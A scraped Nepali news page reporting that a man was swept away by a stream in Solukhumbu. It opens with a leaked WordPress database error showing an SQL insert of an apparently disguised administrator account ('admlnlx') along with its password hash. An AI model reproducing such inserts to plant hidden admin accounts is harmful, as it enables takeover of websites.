WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiBBoBviQmS6ssUynA5NdeWsQKQSNL/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:36:09', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुको नेचासल्यालनमा खहरेखोलाले एक जना पुरुष बगायो – Gaule Khabar

सोलुखुम्बुको नेचासल्यालनमा खहरेखोलाले एक जना पुरुष बगायो

सोलुखुम्बुको नेचासल्यालनमा खहरेखोलाले एक जना पुरुष बगायो

सोलुखुम्बु । नेचासल्यान गाउँपालिकाको खहरेखोलाले एक जना पुरुषलाई बगाएको छ ।

नेचासल्यान गाउँपालिका ४ फुर्केका ५५ वर्षिय भैमान राईलाई खहरेखोलाले बगाएको हो ।

राईलाई आईतबार बिहान साथीसँग सल्लयान, ख्याम्पु बाट घर फर्किने क्रममा खहरेखोलाले बगाएको हो । अहिले स्थानीय र प्रहरीको सक्रियतामा खोजि कार्य भईरहेको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका